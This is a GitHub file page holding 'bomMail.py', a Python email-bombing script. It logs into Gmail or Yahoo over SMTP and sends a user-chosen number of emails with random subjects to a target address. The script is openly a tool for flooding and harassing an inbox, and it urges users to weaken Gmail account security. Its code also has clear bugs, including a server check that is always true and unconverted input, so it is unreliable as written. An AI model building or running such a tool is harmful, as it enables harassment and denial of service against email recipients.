-
Notifications
You must be signed in to change notification settings - Fork 0
/
bomMail.py
71 lines (62 loc) · 2.17 KB
/
bomMail.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/bin/python
#BomMail
import os
import smtplib
import getpass
import sys
import time
#from colorama
#import init, Style, Back, Fore
print ("""
/$$$$$$$ /$$ /$$ /$$ /$$
| $$__ $$ | $$$ /$$$ |__/| $$
| $$ \ $$ /$$$$$$ /$$$$$$/$$$$ | $$$$ /$$$$ /$$$$$$ /$$| $$
| $$$$$$$ /$$__ $$| $$_ $$_ $$| $$ $$/$$ $$ |____ $$| $$| $$
| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$ $$$| $$ /$$$$$$$| $$| $$
| $$ \ $$| $$ | $$| $$ | $$ | $$| $$\ $ | $$ /$$__ $$| $$| $$
| $$$$$$$/| $$$$$$/| $$ | $$ | $$| $$ \/ | $$| $$$$$$$| $$| $$$$$$$$
|_______/ \______/ |__/ |__/ |__/|__/ |__/ \_______/|__/|________/
""")
def BomEmail():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
server = input ('MailServer 1.Gmail/2.Yahoo: ')
user = input('Email: ')
passwd = getpass.getpass('Password: ')
to = input('\nTo: ')
#subject = raw_input('Subject: ')
body = input('Message: ')
total = input('Number of send: ')
if server == 'gmail' or '1' or 'Gmail':
smtp_server = 'smtp.gmail.com'
port = 587
elif server == 'yahoo' or '2' or 'Yahoo':
smtp_server = 'smtp.mail.yahoo.com'
port = 25
else:
print ("Kindly Enter Your Answer in 1 or 2 in Mail Server.")
sys.exit()
print ("")
try:
server = smtplib.SMTP(smtp_server,port)
server.ehlo()
if smtp_server == "smtp.gmail.com":
server.starttls()
server.login(user,passwd)
for i in range(1, total+1):
subject = os.urandom(9)
msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
server.sendmail(user,to,msg)
print ("\r[+]E-mails sent: %i") % i
sys.stdout.flush()
server.quit()
print ("\n Done !!!")
print (" BomMail :~ Enjoy :)")
except KeyboardInterrupt:
print ("[-] Canceled")
sys.exit()
except smtplib.SMTPAuthenticationError:
print ("\n[!] Allow access to less secure apps on your gmail account. https://www.google.com/settings/security/lesssecureapps")
sys.exit()